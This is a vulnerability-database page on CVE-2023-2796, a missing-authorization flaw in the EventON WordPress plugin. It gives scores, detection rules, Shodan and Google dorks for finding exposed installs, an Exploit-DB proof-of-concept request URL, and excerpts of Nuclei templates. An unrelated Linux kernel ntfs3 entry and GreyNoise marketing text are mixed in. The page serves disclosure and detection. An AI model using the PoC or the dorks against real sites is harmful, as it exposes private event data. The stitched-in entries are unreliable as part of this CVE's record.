CVE-2023-2796
published 2023-07-10CVE-2023-2796: The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to…
PriorityP181medium5.3CVSS 3.1
AVNACLPRNUINSUCLINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
37.47%
98.3th percentile
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| myeventon | eventon | < 2.1.2 | 2.1.2 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
BEGIN:VCALENDAR / END:VCALENDAR in response body
- →Detect unauthenticated GET requests to the eventon_ics_download AJAX action; a successful exploit returns HTTP 200 with a valid iCalendar body (BEGIN:VCALENDAR / END:VCALENDAR) and Content-Type: text/Calendar header. ↗
- →Monitor web server logs for unauthenticated requests to /wp-admin/admin-ajax.php with the query parameter action=eventon_ics_download, especially with sequential numeric event_id values (enumeration/IDOR pattern). ↗
- →Use Shodan dorks to identify exposed vulnerable instances: search for vuln:CVE-2023-2796, http.html:/wp-content/plugins/eventon-lite/, or http.html:/wp-content/plugins/eventon/ ↗
- →Use Google dork to find exposed EventON plugin installations: inurl:"/wp-content/plugins/eventon/" ↗
- ·The vulnerability affects EventON Free versions before 2.1.2 (and separately before 2.2.8 for a related issue). The exploit PoC was tested against version 4.4 (Premium). Ensure version checks cover both Free and Premium branches. ↗
- ·The Nuclei template for CVE-2023-2796 uses event_id=1 as a fixed probe value; in real enumeration, attackers iterate numeric IDs. Detection rules should account for sequential or varied numeric event_id values, not just id=1. ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
vulncheck5.3MEDIUM
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v77x-qc2p-7878: The EventON WordPress plugin before 2
ghsa_unreviewed·2023-07-10
CVE-2023-2796 [MEDIUM] CWE-862 GHSA-v77x-qc2p-7878: The EventON WordPress plugin before 2
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
VulnCheck
myeventon eventon Missing Authorization
vulncheck·2023·CVSS 5.3
CVE-2023-2796 [MEDIUM] myeventon eventon Missing Authorization
myeventon eventon Missing Authorization
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Affected: myeventon eventon
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2023-2796; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-24&host_type=src&vulnerability=cve-2023-2796; https://dashboard.shadowserver.org/statistics/hon
Red Hat
kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
vendor_redhat·2025-09-16·CVSS 5.5
CVE-2023-53294 [MEDIUM] kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
Syzbot reported a null-ptr-deref bug:
ntfs3: loop0: Different NTFS' sector size (1024) and media sector size
(512)
ntfs3: loop0: Mark volume as dirty due to NTFS errors
general protection fault, probably for non-canonical address
0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
RIP: 0010:d_flags_for_inode fs/dcache.c:1980 [inline]
RIP: 0010:__d_add+0x5ce/0x800 fs/dcache.c:2796
Call Trace:
d_splice_alias+0x122/0x3b0 fs/dcache.c:3191
lookup_open fs/namei.c:3391 [inline]
open_last_lookups fs/namei.c:3481 [inline]
path_openat+0x
No detection rules found.
Exploit-DB
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
exploitdb·2023-08-04·CVSS 5.3
CVE-2023-2796 [MEDIUM] Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
---
# Exploit Title: Wordpress Plugin EventON Calendar 4.4 - Unauthenticated Event Access
# Date: 03.08.2023
# Exploit Author: Miguel Santareno
# Vendor Homepage: https://www.myeventon.com/
# Version: 4.4
# Tested on: Google and Firefox latest version
# CVE : CVE-2023-2796
# 1. Description
The plugin lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
# 2. Proof of Concept (PoC)
Proof of Concept:
https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=value
Nuclei
EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
nuclei·CVSS 5.3
CVE-2024-0235 [MEDIUM] EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
Template:
id: CVE-2024-0235
info:
name: EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
author: ProjectDiscoveryAI
severity: medium
description: |
The EventON WordPress plugin before 4.5.5, EventON WordPress plugin before 2.2.7 do not have authorization in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog.
impact: |
An attacker could potentially access sensitive email information.
remediation: |
Update to the latest version of the EventON WordPress
Nuclei
EventON <= 2.1 - Missing Authorization
nuclei·CVSS 5.3
CVE-2023-2796 [MEDIUM] EventON <= 2.1 - Missing Authorization
EventON <= 2.1 - Missing Authorization
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
Template:
id: CVE-2023-2796
info:
name: EventON <= 2.1 - Missing Authorization
author: randomrobbie
severity: medium
description: |
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
impact: |
Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
remediation: Fixed in v
Greynoiseio
NoiseLetter September 2025
blogs_greynoiseio
NoiseLetter September 2025
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bugzilla
CVE-2023-53294 kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
bugzilla·2025-09-16·CVSS 5.5
CVE-2023-53294 [MEDIUM] CVE-2023-53294 kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
CVE-2023-53294 kernel: fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
In the Linux kernel, the following vulnerability has been resolved:
fs/ntfs3: Fix null-ptr-deref on inode->i_op in ntfs_lookup()
Syzbot reported a null-ptr-deref bug:
ntfs3: loop0: Different NTFS' sector size (1024) and media sector size
(512)
ntfs3: loop0: Mark volume as dirty due to NTFS errors
general protection fault, probably for non-canonical address
0xdffffc0000000001: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000008-0x000000000000000f]
RIP: 0010:d_flags_for_inode fs/dcache.c:1980 [inline]
RIP: 0010:__d_add+0x5ce/0x800 fs/dcache.c:2796
Call Trace:
d_splice_alias+0x122/0x3b0 fs/dcache.c:3191
lookup_open fs/namei.c:3391 [inline]
open_last_lookups fs/namei.c:3481 [inli
http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.htmlhttps://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0dhttp://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.htmlhttps://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
2023-07-10
Published
Exploited in the wild